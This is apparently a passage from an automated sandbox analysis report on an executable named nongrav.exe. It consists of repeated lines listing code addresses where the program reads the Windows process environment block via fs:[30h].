Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h]	15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC5210 mov ecx, dword ptr fs:[00000030h]	15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h]	15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC5210 mov eax, dword ptr fs:[00000030h]	15_2_1EAC5210
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD766D mov eax, dword ptr fs:[00000030h]	15_2_1EAD766D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB0927A mov eax, dword ptr fs:[00000030h]	15_2_1EB0927A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB7B260 mov eax, dword ptr fs:[00000030h]	15_2_1EB7B260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB7B260 mov eax, dword ptr fs:[00000030h]	15_2_1EB7B260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98A62 mov eax, dword ptr fs:[00000030h]	15_2_1EB98A62
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h]	15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h]	15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h]	15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h]	15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEAE73 mov eax, dword ptr fs:[00000030h]	15_2_1EAEAE73
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB54257 mov eax, dword ptr fs:[00000030h]	15_2_1EB54257
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h]	15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h]	15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h]	15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9240 mov eax, dword ptr fs:[00000030h]	15_2_1EAC9240
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]	15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]	15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]	15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]	15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]	15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD7E41 mov eax, dword ptr fs:[00000030h]	15_2_1EAD7E41
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8EA55 mov eax, dword ptr fs:[00000030h]	15_2_1EB8EA55
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8AE44 mov eax, dword ptr fs:[00000030h]	15_2_1EB8AE44
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8AE44 mov eax, dword ptr fs:[00000030h]	15_2_1EB8AE44
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h]	15_2_1EAF4BAD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h]	15_2_1EAF4BAD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF4BAD mov eax, dword ptr fs:[00000030h]	15_2_1EAF4BAD
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB95BA5 mov eax, dword ptr fs:[00000030h]	15_2_1EB95BA5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h]	15_2_1EB47794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h]	15_2_1EB47794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47794 mov eax, dword ptr fs:[00000030h]	15_2_1EB47794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD1B8F mov eax, dword ptr fs:[00000030h]	15_2_1EAD1B8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD1B8F mov eax, dword ptr fs:[00000030h]	15_2_1EAD1B8F
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8138A mov eax, dword ptr fs:[00000030h]	15_2_1EB8138A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB7D380 mov ecx, dword ptr fs:[00000030h]	15_2_1EB7D380
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2397 mov eax, dword ptr fs:[00000030h]	15_2_1EAF2397
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD8794 mov eax, dword ptr fs:[00000030h]	15_2_1EAD8794
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFB390 mov eax, dword ptr fs:[00000030h]	15_2_1EAFB390
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB037F5 mov eax, dword ptr fs:[00000030h]	15_2_1EB037F5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEDBE9 mov eax, dword ptr fs:[00000030h]	15_2_1EAEDBE9
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]	15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]	15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]	15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]	15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]	15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF03E2 mov eax, dword ptr fs:[00000030h]	15_2_1EAF03E2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB453CA mov eax, dword ptr fs:[00000030h]	15_2_1EB453CA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB453CA mov eax, dword ptr fs:[00000030h]	15_2_1EB453CA
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC4F2E mov eax, dword ptr fs:[00000030h]	15_2_1EAC4F2E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC4F2E mov eax, dword ptr fs:[00000030h]	15_2_1EAC4F2E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFE730 mov eax, dword ptr fs:[00000030h]	15_2_1EAFE730
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA70E mov eax, dword ptr fs:[00000030h]	15_2_1EAFA70E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA70E mov eax, dword ptr fs:[00000030h]	15_2_1EAFA70E
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB8131B mov eax, dword ptr fs:[00000030h]	15_2_1EB8131B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5FF10 mov eax, dword ptr fs:[00000030h]	15_2_1EB5FF10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5FF10 mov eax, dword ptr fs:[00000030h]	15_2_1EB5FF10
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB9070D mov eax, dword ptr fs:[00000030h]	15_2_1EB9070D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB9070D mov eax, dword ptr fs:[00000030h]	15_2_1EB9070D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEF716 mov eax, dword ptr fs:[00000030h]	15_2_1EAEF716
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACDB60 mov ecx, dword ptr fs:[00000030h]	15_2_1EACDB60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADFF60 mov eax, dword ptr fs:[00000030h]	15_2_1EADFF60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98F6A mov eax, dword ptr fs:[00000030h]	15_2_1EB98F6A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF3B7A mov eax, dword ptr fs:[00000030h]	15_2_1EAF3B7A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF3B7A mov eax, dword ptr fs:[00000030h]	15_2_1EAF3B7A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98B58 mov eax, dword ptr fs:[00000030h]	15_2_1EB98B58
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACDB40 mov eax, dword ptr fs:[00000030h]	15_2_1EACDB40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADEF40 mov eax, dword ptr fs:[00000030h]	15_2_1EADEF40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACF358 mov eax, dword ptr fs:[00000030h]	15_2_1EACF358
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]	15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]	15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]	15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]	15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]	15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF20A0 mov eax, dword ptr fs:[00000030h]	15_2_1EAF20A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFF0BF mov ecx, dword ptr fs:[00000030h]	15_2_1EAFF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFF0BF mov eax, dword ptr fs:[00000030h]	15_2_1EAFF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFF0BF mov eax, dword ptr fs:[00000030h]	15_2_1EAFF0BF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB090AF mov eax, dword ptr fs:[00000030h]	15_2_1EB090AF
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC9080 mov eax, dword ptr fs:[00000030h]	15_2_1EAC9080
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB43884 mov eax, dword ptr fs:[00000030h]	15_2_1EB43884
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB43884 mov eax, dword ptr fs:[00000030h]	15_2_1EB43884
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAD849B mov eax, dword ptr fs:[00000030h]	15_2_1EAD849B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC58EC mov eax, dword ptr fs:[00000030h]	15_2_1EAC58EC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB814FB mov eax, dword ptr fs:[00000030h]	15_2_1EB814FB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h]	15_2_1EB46CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h]	15_2_1EB46CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46CF0 mov eax, dword ptr fs:[00000030h]	15_2_1EB46CF0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h]	15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov ecx, dword ptr fs:[00000030h]	15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h]	15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h]	15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h]	15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5B8D0 mov eax, dword ptr fs:[00000030h]	15_2_1EB5B8D0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB98CD6 mov eax, dword ptr fs:[00000030h]	15_2_1EB98CD6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h]	15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h]	15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h]	15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h]	15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF002D mov eax, dword ptr fs:[00000030h]	15_2_1EAF002D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFBC2C mov eax, dword ptr fs:[00000030h]	15_2_1EAFBC2C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h]	15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h]	15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h]	15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EADB02A mov eax, dword ptr fs:[00000030h]	15_2_1EADB02A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h]	15_2_1EB47016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h]	15_2_1EB47016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB47016 mov eax, dword ptr fs:[00000030h]	15_2_1EB47016
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB94015 mov eax, dword ptr fs:[00000030h]	15_2_1EB94015
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB94015 mov eax, dword ptr fs:[00000030h]	15_2_1EB94015
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h]	15_2_1EB9740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h]	15_2_1EB9740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB9740D mov eax, dword ptr fs:[00000030h]	15_2_1EB9740D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB81C06 mov eax, dword ptr fs:[00000030h]	15_2_1EB81C06
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h]	15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h]	15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h]	15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB46C0A mov eax, dword ptr fs:[00000030h]	15_2_1EB46C0A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE746D mov eax, dword ptr fs:[00000030h]	15_2_1EAE746D
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB82073 mov eax, dword ptr fs:[00000030h]	15_2_1EB82073
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB91074 mov eax, dword ptr fs:[00000030h]	15_2_1EB91074
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA44B mov eax, dword ptr fs:[00000030h]	15_2_1EAFA44B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5C450 mov eax, dword ptr fs:[00000030h]	15_2_1EB5C450
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB5C450 mov eax, dword ptr fs:[00000030h]	15_2_1EB5C450
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE0050 mov eax, dword ptr fs:[00000030h]	15_2_1EAE0050
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAE0050 mov eax, dword ptr fs:[00000030h]	15_2_1EAE0050
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h]	15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h]	15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h]	15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB451BE mov eax, dword ptr fs:[00000030h]	15_2_1EB451BE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF35A1 mov eax, dword ptr fs:[00000030h]	15_2_1EAF35A1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF61A0 mov eax, dword ptr fs:[00000030h]	15_2_1EAF61A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF61A0 mov eax, dword ptr fs:[00000030h]	15_2_1EAF61A0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB469A6 mov eax, dword ptr fs:[00000030h]	15_2_1EB469A6
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB905AC mov eax, dword ptr fs:[00000030h]	15_2_1EB905AC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB905AC mov eax, dword ptr fs:[00000030h]	15_2_1EB905AC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h]	15_2_1EAF1DB5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h]	15_2_1EAF1DB5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF1DB5 mov eax, dword ptr fs:[00000030h]	15_2_1EAF1DB5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]	15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]	15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]	15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]	15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAC2D8A mov eax, dword ptr fs:[00000030h]	15_2_1EAC2D8A
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFA185 mov eax, dword ptr fs:[00000030h]	15_2_1EAFA185
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAEC182 mov eax, dword ptr fs:[00000030h]	15_2_1EAEC182
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]	15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]	15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]	15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2581 mov eax, dword ptr fs:[00000030h]	15_2_1EAF2581
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFFD9B mov eax, dword ptr fs:[00000030h]	15_2_1EAFFD9B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAFFD9B mov eax, dword ptr fs:[00000030h]	15_2_1EAFFD9B
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EAF2990 mov eax, dword ptr fs:[00000030h]	15_2_1EAF2990
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EB78DF1 mov eax, dword ptr fs:[00000030h]	15_2_1EB78DF1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h]	15_2_1EACB1E1
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe	Code function: 15_2_1EACB1E1 mov eax, dword ptr fs:[00000030h]	15_2_1EACB1E1
